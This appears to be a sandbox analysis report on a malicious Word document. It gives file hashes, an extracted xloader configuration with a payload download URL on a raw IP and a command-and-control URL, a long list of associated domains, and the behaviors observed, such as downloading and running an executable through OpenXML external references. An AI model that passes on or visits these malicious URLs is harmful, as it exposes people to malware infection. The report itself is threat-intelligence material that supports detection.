General
-
Target
2f1dfefc6a2744bf853c5eb70a3df665.docx.zip
-
Size
7KB
-
Sample
210614-d1azk3wrbj
-
MD5
3325306a3e6c341de30a4038905f5945
-
SHA1
a1fde655303040c00a863097295f1199314b6d32
-
SHA256
96e01da5fe7172331adb93fee0fc4d383f90d2672501138aa0a1c6bec0a48282
-
SHA512
4a77610084ab3d8eede9c58d44ce3650fa71ae7d7116a77098afce6108ee57ad6e9d3d169acb716fef589b4d411cf180f748c08a772bc17eae1c48847ddff673
Static task
static1
Behavioral task
behavioral1
Sample
2f1dfefc6a2744bf853c5eb70a3df665.docx
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2f1dfefc6a2744bf853c5eb70a3df665.docx
Resource
win10v20210408
Malware Config
Extracted
http://192.3.141.131/-..........................................-......................-/.......................................wbk
Extracted
xloader
2.3
http://www.morsowanie.com/j26a/
reviewdrpopp.com
socaldelicious.com
juomas.com
bhcrown.com
blaxies3.com
tpcmotion.com
corporacionms.com
schwartstack.com
smw319.com
bacheasy.xyz
visitmojacar.info
xn--ycr7s7jl43p.com
motherland-foods.com
helenternet.com
santabobgroup.com
lefoyerbanquets.com
ambert2021.com
multitudo21.com
abominos.com
asesoriadtesis.com
maternitatemocionada.com
afafiabaya.com
tokade.club
animas.one
globalrevenue-method.life
mambosaucedc.com
bowodee.com
thechampagnewanderlust.com
u401k.com
lokwith999.com
bryanandvictoria.com
lifeissweat.com
cercalconsultores.com
caddieup.golf
mytewi.com
dbcn-kerjadirumah.com
rthesamba.com
7695696.com
bestdeals-shop.com
lizelleh.com
theshadesofyou.com
meikaixin.com
ceipvirgendeloreto.com
bazzaretracker.com
epboards.com
siriusksa.com
xn--pypl-qoac.com
shopdreamwife.com
healthcareracism.com
ashgrovekinsale.com
maghion.com
shopmedjool.com
313videos.com
twistedseedcomic.com
donggangxl.com
crozent.com
dialite.pro
fjqljf.com
28stanton.com
hvtnywveba.club
ukinbase.com
criandojuntas.com
centenhouse.com
motion-mill-tv.com
Targets
-
-
Target
2f1dfefc6a2744bf853c5eb70a3df665.docx
-
Size
10KB
-
MD5
8d5d15825e35f4f19f2d2ac1836c5087
-
SHA1
09c047b6473703704805748926e226c700322593
-
SHA256
2109c5a512a7c5f23fd4b7eb251195ac00f5d8e3798bee07927f89c5b50bc2bb
-
SHA512
d965bba779c742fa4e0733b3cc25b13684ad301381519c1d7d85470b3df94b82883362e75d7a1c929595a2e1800c7b3fa3d56b9471269cf05c7202007118ea3d
-
Xloader Payload
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Executes dropped EXE
-
Abuses OpenXML format to download file from external location
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Suspicious use of SetThreadContext
-